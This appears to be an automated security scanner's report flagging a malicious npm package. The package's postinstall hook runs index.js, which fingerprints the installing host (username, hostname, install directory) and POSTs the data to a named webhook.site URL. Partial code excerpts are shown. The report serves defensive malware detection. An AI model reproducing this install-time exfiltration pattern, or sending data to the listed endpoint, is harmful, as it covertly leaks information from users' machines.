AI Security Review
scanned 3h ago · by lpm-firewall-aiNpm installation automatically executes `index.js`. It fingerprints the installing host and exfiltrates the data to an external webhook.
Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall
Impact
Leaks local username, hostname, and project/install working-directory information.
Mechanism
install-time host fingerprinting and HTTPS exfiltration
Attack narrative
On installation, npm invokes `node index.js` through the package's `postinstall` hook. The script reads the local account username, hostname, and `INIT_CWD` or current directory, serializes them into JSON, and sends them via HTTPS POST to a third-party webhook endpoint. This is unsolicited install-time environment fingerprinting and data exfiltration.
Rationale
Direct inspection confirms concrete, unsolicited install-time collection and external exfiltration with no package-aligned functionality. This meets the blocking threshold for malicious behavior.
Evidence
package.jsonindex.js
Network endpoints1
webhook.site/cde465c1-3853-40ea-880c-fdca6fe508cc
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `package.json` defines `postinstall: node index.js`.
- `index.js` collects username, hostname, and install working directory.
- `index.js` POSTs the collected host data to a third-party `webhook.site` URL.
- The exfiltration runs automatically during npm installation, without user action or package functionality.
Evidence against
- No additional package files or benign runtime functionality were present.
- No credential-file reads, shell execution, or persistence beyond the install-time exfiltration were observed.
Behavioral surface
EnvironmentVarsNetwork
UrlStrings
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node index.js
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkgindex.jsView file
1const os = require('os');
L2: const https = require('https');
L3:
L4: const payload = JSON.stringify({
L5: user: os.userInfo().username,
L6: cwd: process.env.INIT_CWD || process.cwd(),
L7: hostname: os.hostname(),
L8: // ip : localIP()
...
L31:
L32: req.write(payload);
L33: req.end();
High
Host Fingerprint Exfiltration
Source collects local host identity data and sends it to an external endpoint.
index.jsView on unpkg · L1Findings
2 High2 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighHost Fingerprint Exfiltrationindex.js
MediumNetwork
MediumEnvironment Vars
LowScripts Present
LowUrl Strings